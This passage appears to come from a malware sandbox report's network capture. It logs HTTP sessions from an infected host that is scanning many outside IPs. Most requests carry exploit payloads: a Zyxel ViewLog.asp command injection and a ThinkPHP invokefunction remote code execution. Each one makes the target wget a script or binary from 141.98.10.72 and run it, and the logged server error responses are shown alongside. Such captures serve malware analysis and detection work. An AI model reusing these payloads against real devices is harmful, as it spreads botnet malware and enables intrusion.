                                                        Keep-Alive: timeout=60
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        560192.168.2.144288494.66.86.2438080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:10.488022089 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:11.169049025 CET411INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 09:55:20 GMT
                                                        Server: Webs
                                                        X-Frame-Options: SAMEORIGIN
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        561192.168.2.143828494.227.46.2158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:10.582474947 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:10.815713882 CET322INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:21 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        562192.168.2.146060494.120.51.2008080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:10.608231068 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        563192.168.2.144436894.122.73.1758080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:10.608505964 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        564192.168.2.145325094.123.82.1858080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:10.608622074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        565192.168.2.144191688.221.170.5480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:11.184633017 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:11.388221025 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:11 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:11 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 65 66 30 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 36 35 31 26 23 34 36 3b 61 66 62 33 65 66 63 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4ef01002&#46;1707899651&#46;afb3efcc</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        566192.168.2.145950888.198.51.1280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:11.192312002 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:11.403492928 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:11 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        567192.168.2.143640295.179.224.4180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:11.374880075 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:11.564964056 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:11 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        568192.168.2.145154495.217.111.15880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:11.593118906 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:11.811291933 CET507INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:11 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Strict-Transport-Security: max-age= 31536000; includeSubdomains; preload
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        569192.168.2.144380495.217.156.8480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:11.600095034 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        570192.168.2.145957295.9.158.1480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:11.635149956 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:11.895807028 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:34:07 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        571192.168.2.144068495.85.127.2880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:11.665503979 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        572192.168.2.143571495.58.74.15480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:11.678136110 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:11.982021093 CET29INHTTP/1.1 200 OK
                                                        Feb 14, 2024 09:34:11.982178926 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        573192.168.2.143820695.210.34.768080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.387684107 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        574192.168.2.144794294.130.68.1818080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.393352032 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:12.597923994 CET304INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:12 GMT
                                                        Server: Apache
                                                        Content-Length: 126
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                        Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        575192.168.2.144301894.123.127.1188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.435832024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        576192.168.2.144597694.120.96.2398080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.436377048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        577192.168.2.145202494.121.147.1518080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:12.437994003 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
